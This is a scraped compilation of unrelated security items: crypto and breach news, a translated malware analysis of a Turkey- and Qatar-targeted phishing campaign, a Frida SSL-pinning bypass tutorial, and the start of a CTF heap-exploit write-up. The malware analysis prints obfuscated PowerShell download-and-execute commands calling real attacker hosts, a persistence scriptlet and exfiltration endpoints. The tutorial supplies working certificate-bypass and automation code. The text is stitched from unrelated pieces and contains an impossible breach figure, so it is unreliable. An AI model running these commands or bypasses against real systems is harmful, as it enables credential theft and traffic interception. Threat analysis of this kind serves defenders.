The platform is now available to both accredited and non-accredited investors in the United States and other markets. It implements a one-time verification procedure through an application called Investor Passport that allows users to invest based on their eligibility. Open Finance Network has also developed its own security token standard called the Smart Securities Standard in order to be able to offer both token issuance and secondary market trading.

Kakao Invests in Israeli Startup Orbs

South Korean Internet giant Kakao Corp. has invested in the Israeli crypto startup Orbs through its venture arm, Kakao Investment, Reuters reported. Kakao, which is South Korea’s largest messaging app operator, announced earlier this year its plans to establish a unit focused on blockchain technology. Orbs, which did not disclose the size of the investment, said the funds will help it grow and build on its existing partnership with the Kakao blockchain subsidiary Ground X. The two companies are already working together to develop applications of crypto technology.

Abra Giving Away Bitcoins for Christmas

Digital asset exchange and crypto wallet provider Abra has decided to cheer up crypto enthusiasts during the bear market with a Christmas promotion. The platform is now giving away $25 of BTC to new investors for its ETF-style token called Bit 10. To be eligible for the crypto cashback, however, users have to buy at least $1,000 worth of tokens before the end of this month. And there’s another catch: according to The Next Web, Bit 10 is a market-tracking index token that can be purchased and sold only through the Abra app. The token tracks the top 10 cryptocurrencies each month, which means its value will only go up in a bull market, but may struggle in the current one.

Images courtesy of Shutterstock, Gilet Jaune Coin.


Bitglass Security Spotlight: Quora and Healthcare Breaches


Quora, a website that allows users to inquire about different topics for credible feedback, was recently attacked by hackers. This website has been trusted by 300 million users, but, due to this immense cyberattack, users are now questioning the safety of their personal data on the site. Last week, Quora discovered that their database had been infiltrated, and that about one-third of their users were affected. The investigation is still ongoing; however, it is certain that user account information has been accessed by an unauthorized third party.

First multi-state healthcare breach impacts 3.9 million

The news of a healthcare breach is severe enough as is, but the announcement of the first multi-state data breach is nothing short of a cybersecurity disaster. The protected health information (PHI) of 3.9 million people was accessed through this single breach, and the affected healthcare companies failed to disclose the occurrence in a timely fashion. A lawsuit was recently filed against the involved healthcare firms, but the investigation shows that the breach actually happened in 2015.

Australia’s anti-encryption bill becomes law

In Australia, law enforcement can now undermine encryption in order to gain unauthorized access to civilian devices. The government claims this will help stop terrorist attacks, homicides, and other serious crimes. However, this allows for the invasion of privacy and creates a loophole for cyber criminals, causing many concerns about the security of sensitive data. Now that the Australian government has set this law, any company or website operating within the country will have to find a way to preserve the trust between them and their users.

Unprotected MongoDB server exposes 66 million

A database with personally identifiable information (PII) of 66 million individuals was found unprotected. This information included full names, contact information, employment history, and more. The availability of this information gives malicious cybercriminals the power to launch targeted phishing attacks that are difficult to recognize. The information seems like it has been scraped from LinkedIn profiles. Fortunately, the data did not fall into the wrong hands and was taken offline before it could affect the users exposed.

Malware attack undetected for four years

The existence of malware within a 1-800-FLOWERS database was recently discovered. The threat was stealing funds from customers’ credit cards for four years before finally being detected. Other information was also collected, including full names, card numbers, expiration dates, and card security codes. More than 500 million California residents have been affected and the state’s attorney general office has filed a legal complaint.


Your digital life can be sold for as low as Rs 3,500 on the Dark web: Kaspersky ...


Your personal data may be up for sale on the Dark Web for as low as Rs 3,500, including stolen social media accounts, banking details and credit card information from sites like Uber as well as gaming and porn websites, new research has warned.

According to cybersecurity firm Kaspersky Lab that investigated Dark Web markets to find out how much personal data is worth, cybercriminals can sell someone's complete digital life for less than $50 (nearly Rs 3,500).

"This can include data from stolen social media accounts, banking details, remote access to servers or desktops, and even data from popular services like Uber, Netflix, and Spotify, as well as gaming websites, dating apps, and porn websites which might store credit card information."



Representational image.

The Dark Web, also referred to as the Dark Net, is an encrypted portion of the internet that is not indexed by search engines.

The Kaspersky researchers found that the price paid for a single hacked account is lower, with most selling for about $1 per account and with criminals offering up discounts for bulk-buying.

"It is clear that data hacking is a major threat to us all, and this applies at both an individual and societal level, because stolen data funds many social evils," said David Jacoby, senior security researcher at Kaspersky Lab.

Data stolen due to people's lax security may have limited resale value, but can be put to many uses.

"This can cause huge problems for an individual victim, who may lose money and their reputation, find themselves being chased for debt that somebody else has incurred in their name, or even suspected of a crime that somebody else has committed using their identity as a cover," said researchers.

The most common way criminals steal this sort of data in the first place is via spear phishing campaigns or by exploiting a web related security vulnerability in an application's software.

After a successful attack, the criminal gets password dumps which contain a combination of emails and passwords for the hacked services.

"With many people using the same password for several accounts, attackers might be able to use this information to access accounts on other platforms too," said Kaspersky Lab.

Interestingly, some criminals selling data even provide their buyers with a lifetime warranty, so if one account stops working, the buyer will receive a new account for free.

"There are steps we can take to prevent it, including by using cybersecurity software, and being aware of how much data we are giving away for free - particularly on publicly available social media profiles, or to organisations," Jacoby noted.


Analysis of a New Phishing Campaign

Incident Overview

During our routine threat hunting we received a report about a phishing incident targeting Turkey. After an initial assessment we decided to investigate further. In the course of the investigation we found that this incident shares similarities with other recent campaigns, which suggests they may come from the same group.

sha256 : [https://t.co/G51LITesM5](https://t.co/G51LITesM5)
ITW Filename : .doc
sha256 : [https://t.co/Bmef4zlHEl](https://t.co/Bmef4zlHEl)
ITW Filename : .doc
The macro in both documents will download and execute the powershell script from hxxp://microsoftdata[.]linkpc[.]net/api/cscript [pic.twitter.com/ndqWSML2eA](https://t.co/ndqWSML2eA)
― Jacob Soo (@_jsoo_) [November 29, 2018](https://twitter.com/_jsoo_/status/1068045034203697152?ref_src=twsrc%5Etfw)

Phishing Documents

The phishing documents target victims in Turkey; at the start of the investigation we also tried to find a campaign aimed at Qatari users. The documents attempt to lure people into attending a meeting of the "Parliamentarians for Al Quds" association held in Istanbul. Parliamentarians for Al Quds is a committee that coordinates "international parliamentarians in support of the Palestinian cause".

Google Translate helps non-Arabic speakers understand the specifics of the phishing lure:

The document invites the victim to attend a conference held from December 13 to 16, titled "Jerusalem, the eternal capital of Palestine". However, no announcement related to this conference has been published on the official website.

Attack Tactics

The attack involves two document files, both following the same traditional tactic: trying to trick the victim into clicking the "Enable Content" button to run malicious code:

The injected code runs a command prompt, which invokes PowerShell, which in turn runs a .ps1 script downloaded from the malicious host.

We reconstructed the attack flow with ReaQta-Hive:

Winword.exe can be seen spawning a cmd.exe instance with a suspicious command line:

"C:\windows\System32\cmd.exe" /c " EcHo iEx ( new-oBjeCt sYStem.Io.COmPreSSiON.defLAtEstreAm([system.Io.mEmorYStrEAM] [ConVerT]::fRomBaSE64STRing( 'BcExEkAwEAXQq+hQSHotCg2FgjbWYolNJv6M63uv75asGPirxvViQjYwzMxr44UVpWnDpz64bUISPYr8BGJt7SOUwht2bA7OeNE7klGGdVEsvZQkIi9/') , [sYsTEM.io.compressIOn.CoMpREssiOnmode]::DECOMPRESs )^^^| % {new-oBjeCt io.STreaMreader( $_, [TexT.ENCoDInG]::aSCii )} ).REadtOEnd() | pOwErSheLl -NoeX -nOlo -NOproFiLe -nOnIn -eXeCuTI BypAss -wiNdoWstYL hiDden -"

De-obfuscating the command line reveals the actual arguments passed to powershell.exe:

IEX (New-Object Net.WebClient).DownloadString('http://microsoftdata.linkpc.net/api/cscript')

The way the arguments are passed to PowerShell is worth examining. It appears to be a method of evading command-line monitoring:

pOwErSheLl -NoeX -nOlo -NOproFiLe -nOnIn -eXeCuTI BypAss -wiNdoWstYL hiDden -

The decoded command is "echoed" straight into powershell.exe, which is why the usual iEx [...] argument does not appear on the powershell.exe command line. At this point powershell.exe infects the target using the script downloaded from hxxp://microsoftdata[.]linkpc[.]net/api/cscript; below is a summary of its content:
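As an added example, not part of ReaQta's analysis, the following Python normalizes the command line above the way a detection engineer would before writing a rule: it resolves PowerShell's abbreviated, case-mangled parameters to their canonical names (PowerShell accepts any unambiguous prefix of a parameter name, which is why `-eXeCuTI` works), recognizes the trailing `-` that makes powershell.exe read its script from stdin, optionally inflates the inline base64/deflate blob, and counts the remaining indicators. The indicator list and its weighting are constructed; the sample command line is the one captured on this page.

```python
"""Normalize and score an obfuscated cmd.exe -> PowerShell launch like the
one captured in the article.  Added example, not part of ReaQta's analysis;
PS_PARAMS relies on PowerShell accepting any unambiguous prefix of a
parameter name, the indicator list and its weighting are constructed, and
SAMPLE_CMDLINE is the command line shown on this page."""
import base64
import re
import zlib

PS_PARAMS = [
    "NoExit", "NoLogo", "NoProfile", "NonInteractive", "ExecutionPolicy",
    "WindowStyle", "Command", "EncodedCommand", "File", "Sta", "Mta",
    "Version", "InputFormat", "OutputFormat",
]

SAMPLE_CMDLINE = r'''"C:\windows\System32\cmd.exe" /c " EcHo iEx ( new-oBjeCt sYStem.Io.COmPreSSiON.defLAtEstreAm([system.Io.mEmorYStrEAM] [ConVerT]::fRomBaSE64STRing( 'BcExEkAwEAXQq+hQSHotCg2FgjbWYolNJv6M63uv75asGPirxvViQjYwzMxr44UVpWnDpz64bUISPYr8BGJt7SOUwht2bA7OeNE7klGGdVEsvZQkIi9/') , [sYsTEM.io.compressIOn.CoMpREssiOnmode]::DECOMPRESs )^^^| % {new-oBjeCt io.STreaMreader( $_, [TexT.ENCoDInG]::aSCii )} ).REadtOEnd() | pOwErSheLl -NoeX -nOlo -NOproFiLe -nOnIn -eXeCuTI BypAss -wiNdoWstYL hiDden -"'''


def canonical_param(token):
    """Resolve a case-mangled, abbreviated parameter ('-eXeCuTI') to its full
    name ('-ExecutionPolicy'); ambiguous prefixes return None, as PowerShell rejects them."""
    name = token.lstrip("-").lower()
    if not name:
        return None
    hits = [p for p in PS_PARAMS if p.lower().startswith(name)]
    return "-" + hits[0] if len(hits) == 1 else None


def normalize_powershell_args(stage):
    """Canonical (parameter, value) pairs plus whether the trailing '-' tells
    powershell.exe to read its script from stdin (so it never appears in argv)."""
    tokens = stage.strip().strip('"').split()
    params, reads_stdin = [], False
    for i, tok in enumerate(tokens[1:], 1):
        if tok == "-" and i == len(tokens) - 1:
            reads_stdin = True
        elif tok.startswith("-"):
            nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
            value = "" if nxt.startswith("-") else nxt.lower()
            params.append((canonical_param(tok) or tok, value))
    return params, reads_stdin


def decode_payload(cmdline):
    """Inflate the FromBase64String(...) blob (DeflateStream = raw deflate); '' if absent or corrupt."""
    m = re.search(r"frombase64string\(\s*'([A-Za-z0-9+/=]+)'", cmdline, re.I)
    if not m:
        return ""
    try:
        return zlib.decompress(base64.b64decode(m.group(1)), -15).decode("ascii", "replace")
    except (zlib.error, ValueError):
        return ""


def analyze_cmdline(cmdline):
    """Return canonical parameters, the stdin flag and a list of triage indicators."""
    low = cmdline.lower()
    # split the cmd.exe pipeline on unescaped '|' (cmd escapes with ^) and take the powershell stage
    stages = re.split(r"(?<!\^)\|", cmdline)
    ps_stage = next((s for s in reversed(stages) if "powershell" in s.lower()), None)
    if ps_stage is None:
        return {"score": 0, "indicators": [], "params": {}, "stdin": False}
    params, reads_stdin = normalize_powershell_args(ps_stage)
    pmap = dict(params)
    ind = []
    if reads_stdin and "echo" in low:
        ind.append("script echoed into powershell via stdin ('-')")
    if pmap.get("-WindowStyle") == "hidden":
        ind.append("-WindowStyle hidden")
    if pmap.get("-ExecutionPolicy") == "bypass":
        ind.append("-ExecutionPolicy bypass")
    if "-NoProfile" in pmap and "-NonInteractive" in pmap:
        ind.append("-NoProfile -NonInteractive")
    if "frombase64string" in low and "deflatestream" in low:
        ind.append("base64+deflate decoder inline")
    if re.search(r"\biex\b", low):
        ind.append("Invoke-Expression on decoded text")
    mixed = sum(1 for t in cmdline.split() if re.search(r"[a-z][A-Z].*[a-z][A-Z]", t))
    if mixed >= 3:
        ind.append("randomized letter case")
    return {"score": len(ind), "indicators": ind, "params": pmap, "stdin": reads_stdin}
```

The point of normalizing before matching is that a rule written against the literal `-ExecutionPolicy Bypass` string misses this sample, while a rule written against the canonical parameter set does not, and the stdin flag explains why the `iEx` payload is visible only on the cmd.exe command line, never on the powershell.exe one.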

The PowerShell script steals cookies, sessions and login data from Chrome, Opera and Firefox, and also has a keylogging module. The harvested data is then exfiltrated to the following C2 server:

hxxp://microsoftdata[.]linkpc[.]net

该脚本下载与浏览器的 localdb (分析窗口#4)交互所需的 sqlite DLL ,它创建一个 GlobalMutex GlobalrYF1pgeADA 以避免攻击程序窃取多个目标的信息。它将初始化键盘记录器并循环捕获所需的功能信息,最后建立持久性。

应特别注意黑客所使用的攻击持久性方法:计划任务用于持续攻击。

之后,下列代码会被执行:

<?XML version="1.0"?>
<scriptlet>
<registration
progid="rYF1pgeADA"
classid="{3cf925ab-14c5-4324-9b5c-bbe294ac03a0}" >
<script language="JScript">
<![CDATA[
p = 'Powershell';
c = ' -WiND hiDdeN -nOproFILe -eXeCUTiON bypaSS -Nol -ComMa "iEx ( new-oBjeCt sYStem.Io.COmPreSSiON.defLAtEstreAm([system.Io.mEmorYStrEAM] [ConVerT]::fRomBaSE64STRing( \'BcExEkAwEAXQq+hQSHotCg2FgjbWYolNJv6M63uv75asGPirxvViQjYwzMxr44UVpWnDpz64bUISPYr8BGJt7SOUwht2bA7OeNE7klGGdVEsvZQkIi9/\') , [sYsTEM.io.compressIOn.CoMpREssiOnmode]::DECOMPRESs )| % {new-oBjeCt io.STreaMreader( $_, [TexT.ENCoDInG]::aSCii )} ).REadtOEnd() "';
r = new ActiveXObject("WScript.Shell").Run(p + c,0,false);
]]>
</script>
</registration>
</scriptlet>

ReaQta-Hive automatically flags this behaviour as anomalous and reconstructs the chain, as shown below:

Script functionality

As described above, the script delivered by the phishing campaign steals cookies and login data from Google Chrome / Firefox / Opera, runs a keylogger, persists through a scheduled task and executes a .sct scriptlet (the squiblydoo technique). The script also accepts custom scripts pushed from the C2, which means the attacker can extend its functionality at will:

The function list, for future reference:

function Set-Key
function Set-EncryptedData
function Uid
function CookiesTo-MYJson ([System.Collections.ArrayList] $ArrayList)
function PasswordsTo-MYJson ([System.Collections.ArrayList] $ArrayList)
function unProtecte ($data)
function ChromeDB
function FirefoxDB
function OperaDB
function Add-SQLite ($link)
function urlPOST($link,$data)
function OperaSESSION ($SQLiteDB,$search,$condition)
function FirefoxSESSION ($SQLiteDB,$search,$condition)
function ChromeSESSION ($SQLiteDB,$search,$condition)
function ChromePASS ($SQLiteDB)
function BrowsersLOGINS
function _sct
function InstallSCT
function BrowsersPS
function BrowsersLOGGER
function InitLOGGER
function BrowsersCOOKIES ($website,$cname)

The keylogger appears to use the same code as this GitHub repository:

https://github.com/lazywinadmin/PowerShell/blob/master/TOOL-Start-KeyLogger/Start-KeyLogger.ps1

C2 infrastructure and samples

The C2 consistently shows one interesting trait: the URL path always has the form /api/{endpoint}:

http://{$domain}/api/cscript
http://{$domain}/api/pscript
http://{$domain}/api/logger/submit
http://{$domain}/api/chrome/submit
http://{$domain}/api/firefox/submit
http://{$domain}/api/opera/submit
http://{$domain}/assest/sqlite

With the help of earlier research we were able to find other samples following the same pattern in previous phishing campaigns:

Malicious document targeting [#Qatar](https://twitter.com/hashtag/Qatar?src=hash&ref_src=twsrc%5Etfw), impersonates [@qcharity](https://twitter.com/qcharity?ref_src=twsrc%5Etfw)
Embedded macros download a PowerShell script from:
4host[.]publicvm[.]com/api/cscript
Steals passwords and cookies from browsers
MD5: 9d6ccae4ef4a206345005e58e51ca6cb [pic.twitter.com/Ptrr0iIJi4](https://t.co/Ptrr0iIJi4)
― Curly Cyber (@CurlyCyber) [August 21, 2018](https://twitter.com/CurlyCyber/status/1031937765317980160?ref_src=twsrc%5Etfw)

As pointed out at the beginning, this earlier sample appears to target users in Qatar and impersonates a Qatari charity.

The document was first seen in early August 2018; compared with the current version only a small amount of code has changed, namely the behaviour, the persistence and the script code.

We uploaded the sample to VirusTotal for analysis. In analysis window #1 the cmd.exe command line is not obfuscated at all:

"C:\Windows\System32\cmd.exe" /C "Echo IEX (New-Object Net.WebClient).DownloadString('http://4host.publicvm.com/api/cscript') | PowersHell -NOpROfIL -eX BYpAss -NOlOgo -wiNdoWs HiDdEN -noeXIt -noNI -"

For completeness, here is the earlier version of the PowerShell script, which differs in a few places:

Original C2 address:

hxxp://4host[.]publicvm[.]com/

The three documents share a similar metadata structure:

The similarity between the two campaigns is clear, and both domains use the same free dynamic DNS service: DNSExit.

Summary

This attack is interesting because it reaches for several distinct targets. Beyond that, it relies on living-off-the-land binaries (lolbins), carries out its malicious activity through PowerShell, persists through a scheduled task and hides its command line with the "echo" technique. The actor behind it is quite active, and according to our research the type of documents retrieved indicates that these operations are probably politically motivated rather than the work of a cybercrime gang.

Because spear-phishing is so easy to carry out, even a modestly trained operator can run such an attack, which is why it remains a favourite tool of attackers.

ReaQta-Hive uses AI to automatically detect threats like the one just analysed, helping analysts dig into threat activity and automatically surfacing anomalous behaviour. Because there is no traditional binary payload, in-memory threats living on operating system components (lolbins) slip past traditional defences while leaving a small forensic footprint. Contact us if you want to know more about this threat.

IOCs

1d2bbe3fd9021bbed4667628b86156bee8763b3d93cdac6de398c751a281a324 .doc
bf4d4ee4a8e4472c7968586fa0318e556a89bfd94aeb4e72afd99ab340541770 .doc
7a26d5b600a078816beb3a2849827fa7d45ec85ec6c3343b3857f10edfece74c cscript.ps1
hxxp://microsoftdata[.]linkpc[.]net
7c8cf1e3ec35a6f604699f6481f3463e9ae19c93b8efd861b914c8260304d314 qatar.doc
hxxp://4host[.]publicvm[.]com
Global\rYF1pgeADA mutex
Global\wfCQnIo2G7 mutex
http://{$domain}/api/cscript
http://{$domain}/api/pscript
http://{$domain}/api/logger/submit
http://{$domain}/api/chrome/submit
http://{$domain}/api/firefox/submit
http://{$domain}/api/opera/submit
http://{$domain}/assest/sqlite
rYF1pgeADA scheduled task name
wfCQnIo2G7 scheduled task name

This article is a translation of: https://reaqta.com/2018/12/spear-phishing-targeting-qatar-turkey/

Reposted from: 先知社区

No, You Don’t Need to Disable Password Recovery Questions on Windows 10



Recently a group of researchers described a scenario wherein password recovery questions were used to break into windows 10 PCs. This has led to some suggesting disabling the feature. But you don’t need to do this if you’re a home computer user.

So, What’s Going on Here?

As Ars Technica first reported, Windows 10 has added the option to set password recovery questions on local accounts in the past year. Security researchers delved into this and discovered that on a business network this could lead to potential vulnerability.

Right off the bat, you can spot two important points there:

First, the entire scenario relies on computers joined to a domain network―the kind you’d find on a business network with managed computers. Second, the vulnerability applies to local accounts. That’s particularly interesting because if your PC is part of a domain, you’re almost certainly using a centralized domain user account and not a local account. And security questions are not allowed on domain accounts by default.

There’s also a third point that’s even more important. All of this requires the malicious actor first to gain administrator-level access on the network. From there, they could then identify machines connected to the network that still have local accounts and then add security questions to those accounts.

Why bother?

The idea is that if admins discover and revoke the malicious actor’s access, subsequently changing all the passwords, the actor could, in theory, make their way back into the network to these machines and use their custom questions to reset those passwords and regain full access.

The researchers suggested they could also use a hashing tool to determine the previous password, and then restore the old password to hide their access. The trouble here is that most domain networks don’t allow reused passwords by default.

When Ars Technica asked Microsoft for comment, the response was short:

The described technique requires an attacker to already possess administrator access

While that might seem obtuse at first, what Microsoft is implying is right, and it brings us to the real crux of the matter. Once a malicious actor has administrative-level access on a network, the potential damage and avenues of attack go far beyond simple password reset tricks. And if a network is robust enough to prevent the malicious actor from ever gaining administrative-level access, then all of this is moot.

So, in the end, our malicious attacker would need to gain administrator-level access to a business network that uses a Windows domain, find computers that might have local accounts on them, and then create security questions so that they could get back into those computers if they are discovered and locked out. And we’re supposed to be worried about that when their administrator-level access gives them the ability to do so much more harm already.

Got It. So, Does This Apply to Me?

If you’re using a Windows 10 computer at home, the short answer is almost certainly not. And here’s why:

Your home PC is most likely not joined to a domain. Even if it were, you’d have to be using a local account, and most people on Windows 10 are probably using a Microsoft account to sign in. This is because Windows 10 requires a Microsoft Account for many features to work correctly. And while you can take a few extra steps to create a local account instead, Microsoft doesn’t make it the most obvious choice. If you are using a Microsoft Account, then you don’t have the option to use password reset questions. To take advantage of this, someone would need to have either remote or physical access to your PC. And with that level of access, password reset questions are the least of your worries.

So, the chances are very high that none of this research applies to you. But even if you are using a local account joined to a domain, all of this comes down to an age-old set of questions. How much convenience should you give up in the name of security? Conversely, how much security should you give up in the name of convenience?

In this case, the chances of a bad actor accessing your machine and using security questions to gain full control are incredibly remote. And the chances of forgetting your password and needing the questions are a little higher. Take stock of your situation, and make the best choice for you.

TUTORIAL UNIVERSAL ANDROID SSL PINNING IN 10 MINUTES WITH FRIDA


( Original textBY OMESPINO )

Hi everyone, it’s been a while since my last post, but I’m back. I want to show you that you can start hacking Android apps with frida without pain. It took me several hours to figure out how to get the frida installation ready, but in the end it wasn’t really that difficult; the main problem was that I couldn’t find a clear tutorial for beginners in mobile security like me, which is why I decided to write this 10 minute tutorial. If you want to skip the description of frida, go directly to Step 0 to start the installation.

So what is frida, exactly?

Extracted from frida website : “It’s Greasemonkey for native apps, or, put in more technical terms, it’s a dynamic code instrumentation toolkit. It lets you inject snippets of javascript or your own library into native apps on windows, macOS, GNU/linux, iOS, Android, and QNX. Frida also provides you with some simple tools built on top of the Frida API. These can be used as-is, tweaked to your needs, or serve as examples of how to use the API.”

So basically frida is a tool that lets you inject scripts into native apps (in this case Android apps) to modify the application’s behaviour (here: bypass SSL pinning so that a MitM attack works even though the application uses HTTPS/TLS connections) and run dynamic tests in real time.

Disclaimer: this method won’t work against applications that validate certificates in their own code rather than through the platform’s TrustManagerImpl (OkHttp’s CertificatePinner, a custom TrustManager, or a native TLS library), for example Facebook, Instagram, Twitter, PayPal and banking apps. Note that HSTS, which often gets the blame here, is a server-side policy header and does not by itself stop interception once the Burp CA is trusted on the device. Don’t worry, most applications still rely on the platform validation that this hook patches.

Step 0 set up the environment
computer

python 2.7

pip for python

adb tools (Android Debug Bridge tools)

local proxy (Burp Suite by Larry_lau, just kidding, Burp Suite Community Edition)

android phone

android device rooted (in my case oneplus one with android 8.1) or

android emulator with android 4.4.4 to 8.1

Step 1 install frida on your computer

# installing frida via terminal, sometimes you need to run this command as sudo
pip install frida
# since frida 12 the command-line tools (frida, frida-ps, ...) ship in a separate package
pip install frida-tools

Step 2 install frida-server on your device

Since there are many kinds of Android device architectures we need to find out which processor our device has, so connect the device to the computer (with USB debugging enabled) and run the following command:

# getting the processor architecture; in this case it is ARM, there are also x86, x86_64, etc.
adb shell getprop ro.product.cpu.abi
output: armeabi-v7a

Now that we know the architecture we can download the matching frida-server for our device, in this case frida-server-XX.X.X-android-arm, from the frida GitHub releases page (the latest version didn’t work for me, so I highly recommend frida-server-12.0.5-android-arm.xz, but you can try a newer version if you want). Once downloaded we need to extract the frida-server binary and copy it to the device:

# extracting the frida-server binary from the xz file
# for Linux distributions
tar -xJf frida-server-12.0.5-android-arm.xz
# for macOS or BSD based systems
unxz frida-server-12.0.5-android-arm.xz
# then we need to copy the frida-server binary to the device with adb
adb push ./frida-server-12.0.5-android-arm /data/local/tmp/

Step 3 Hello process in frida (frida’s Hello World)

Once we have installed frida (computer) and frida-server (Android) we can start interacting with frida with the following commands:

# first we need to start frida-server with this adb command; the trailing '&' runs it in the background
# disabling SELinux is very important: I spent about 4 hours trying to see what was wrong, and SELinux
# was preventing frida-server from running; frida-server must also run as root
adb shell 'su -c setenforce 0'
adb shell 'su -c /data/local/tmp/frida-server-12.0.5-android-arm &'
# then, if everything works, you can see frida’s hello world with
# frida-ps, which lists the device’s processes; the -U flag selects the USB device
frida-ps -U

Step 5 Set up Burp Suite Community Edition

The quickest way to set up a connection between our devices is to connect the Android device and the computer to the same Wi-Fi, then set the Android Wi-Fi connection to a manual proxy in the advanced section and configure Burp Suite to listen on the computer’s local IP (don’t forget to use the same port).



We also need to install the Burp Suite certificate: once the Android device has the proxy set up, browse to http://burp, click the “CA Certificate” button and download the certificate (note: you need to change the certificate extension from .der to .cer before Android will import it).


Last step: Bypass SSL pinning with Universal Android SSL Pinning Bypass No.2

So we have frida, frida-server and Burp Suite running as expected; the next step is to run the “Universal Android SSL Pinning Bypass No.2” script in order to start sniffing the application’s connections. Get the script and save it locally as name_script.js; here is the blog post about this script by Mattia Vinci (you can also add several scripts to frida from the repo, or custom scripts too). The hook target, TrustManagerImpl.checkTrustedRecursive, exists in the conscrypt shipped with Android 7.0 through 8.1; on older releases the script fails to resolve it.

    /*
     * Universal Android SSL Pinning Bypass by Mattia Vinci and Maurizio Agazzini
     * $ frida -U -f org.package.name -l universal-ssl-check-bypass.js --no-pause
     * https://techblog.mediaservice.net/2018/11/universal-android-ssl-check-bypass-2/
     */
    Java.perform(function() {
        var array_list = Java.use("java.util.ArrayList");
        var ApiClient = Java.use('com.android.org.conscrypt.TrustManagerImpl');

        // checkTrustedRecursive normally returns the validated certificate chain or throws;
        // returning an empty list makes every server certificate pass validation.
        ApiClient.checkTrustedRecursive.implementation = function(a1, a2, a3, a4, a5, a6) {
            // console.log('Bypassing SSL Pinning');
            var k = array_list.$new();
            return k;
        };
    });

So the only thing we have to do is save this script as “frida-ssl-2.js” and run the following command:

# the -l flag runs a custom script, in this case the SSL pinning 2 script
# the -f flag is the APK package name; --no-pause does not interrupt the app
# startup at all and still leaves the spawning of the process to Frida
frida -U -l frida-ssl-2.js --no-pause -f com.example.application

Then the application starts and you will see the results in Burp Suite:


so at this point you successfully bypas
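The whole procedure above, from picking the right frida-server build to spawning the app with the bypass loaded, collapses into a short Python script when the frida Python bindings are used instead of the CLI. The following is an added example, not code from the tutorial or from the frida project: the ABI table is my own (the tutorial only shows armeabi-v7a), the deploy commands mirror the adb steps above, and `spawn_with_bypass` is the API equivalent of `frida -U -f <package> -l script.js --no-pause`. It assumes adb on the PATH and `pip install frida frida-tools`; the frida import is deferred so that the helper functions work without it.

```python
import subprocess

# Mapping from the ABI string `adb shell getprop ro.product.cpu.abi` prints to the suffix of the
# matching frida-server release asset (frida-server-<version>-<suffix>.xz on the releases page).
ABI_TO_ASSET = {
    "armeabi-v7a": "android-arm",
    "armeabi": "android-arm",
    "arm64-v8a": "android-arm64",
    "x86": "android-x86",
    "x86_64": "android-x86_64",
}
REMOTE_DIR = "/data/local/tmp"


def frida_server_asset(abi, version):
    """Name of the frida-server binary for a device ABI, e.g. frida-server-12.0.5-android-arm."""
    abi = abi.strip()
    if abi not in ABI_TO_ASSET:
        raise ValueError("no frida-server build known for ABI %r" % abi)
    return "frida-server-%s-%s" % (version, ABI_TO_ASSET[abi])


def device_abi():
    """Ask the connected device for its primary ABI (needs adb and USB debugging enabled)."""
    out = subprocess.check_output(["adb", "shell", "getprop", "ro.product.cpu.abi"])
    return out.decode().strip()


def deploy_commands(asset):
    """The adb invocations from Steps 2 and 3: push, make executable, SELinux permissive, start as root."""
    remote = "%s/%s" % (REMOTE_DIR, asset)
    return [
        ["adb", "push", asset, remote],
        ["adb", "shell", "su -c 'chmod 755 %s'" % remote],
        ["adb", "shell", "su -c 'setenforce 0'"],
        ["adb", "shell", "su -c '%s &'" % remote],
    ]


def deploy(asset):
    for argv in deploy_commands(asset):
        subprocess.check_call(argv)


# The Universal Android SSL Pinning Bypass No.2 hook (conscrypt TrustManagerImpl, Android 7.0-8.1).
SSL_BYPASS_JS = r"""
Java.perform(function () {
    var ArrayList = Java.use("java.util.ArrayList");
    var TrustManagerImpl = Java.use("com.android.org.conscrypt.TrustManagerImpl");
    // Returning an empty chain instead of throwing makes every certificate "trusted".
    TrustManagerImpl.checkTrustedRecursive.implementation = function (a1, a2, a3, a4, a5, a6) {
        return ArrayList.$new();
    };
});
"""


def spawn_with_bypass(package, js=SSL_BYPASS_JS):
    """Equivalent of `frida -U -f <package> -l script.js --no-pause` through the frida Python API."""
    import frida  # deferred so the helpers above run without the bindings installed
    device = frida.get_usb_device()
    pid = device.spawn([package])          # start the app suspended
    session = device.attach(pid)
    script = session.create_script(js)
    script.on("message", lambda message, data: print(message))
    script.load()                           # hook is in place before any app code runs
    device.resume(pid)
    return session


if __name__ == "__main__":
    import sys
    deploy(frida_server_asset(device_abi(), "12.0.5"))
    spawn_with_bypass(sys.argv[1])
    sys.stdin.readline()                    # keep the session alive until Enter is pressed
```

Spawning (rather than attaching to a running process) matters here: the hook has to be installed before the app performs its first TLS handshake, which is exactly what `--no-pause` with `-f` gives you on the command line.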

Fastbin Attack之雷霆万钧:0ctf2017 babyheap


Key points of this article:
- fastbin attack
- misaligned size construction with __malloc_hook
- a general way of leaking memory despite calloc (heap-overflow "pregnancy", the fastbin attack, and striking the target indirectly from a distance)
- edge effects and decoupling (re-allocating a chunk from the unsorted bin, clearing the bins)
- libc dependency: heap addresses differ between libc versions

Along with my study of the heap I have kept publishing articles on libc heap exploitation; last time I used babynote to explain the unsorted bin attack, and this time I will use 0ctf 2017 babyheap to explain the fastbin attack.

The heap is full of detail and every challenge pwned teaches something new. I reproduced babynote last time by referring to someone else's exploit, so I never felt entirely sure of it; this time the babyheap exploit was developed from start to finish by myself, and both the process and the result were a pleasant surprise: after writing a working exploit I compared it with those published online and found that my approach differed considerably, which means I learned that much more.

Challenge link

1. Reverse engineering and bug hunting

Drop the binary into IDA and F5 on main; it looks like this (I have renamed the functions by hand):


0x01 new_log():

Our chunks are allocated through this function. The index table has the classic structure of heap challenges: an exist field, a size field and a pointer to the user area. Notably the allocator is calloc rather than malloc; calloc zeroes the user area of the chunk it returns, so any leftover fd and bk pointers are cleared, which makes leaking memory harder. The returned index is found by the classic scan over the exist fields, starting at 0.

0x02 edit_log():

The program does not check the Size the user enters, so input of arbitrary length is accepted: a heap overflow. In addition the input is not terminated with a NUL byte, which could also leak memory (after analysis, the leak in this program does not rely on this defect).

0x03 delete_log():

This free routine is written safely: it checks at the index-table level that the chunk the user selected by index exists, and if exist is 0 the chunk has already been freed and free is not called again, which defeats double free; after a successful free the index entry's exist field and heap pointer are cleared as well. No vulnerability here.

0x04 print_log():

which calls sub_130F():

This read function is safe too: it first checks the exist flag, and if exist is 0 nothing is read, so only records that have been created can be read; the output goes through write rather than puts, and the length written is the one recorded in the index table (i.e. only as many bytes as were requested when the record was created).

0x05 Reverse engineering summary:

The program has a heap overflow, but its other protections are fairly good, so the memory leak stage will probably meet substantial resistance; the heap overflow may open the way to a fastbin attack.

2. Exploitation analysis

Before the concrete analysis, a rough overview of what a fastbin attack involves:

(for a detailed treatment see the CTF Wiki tutorial)

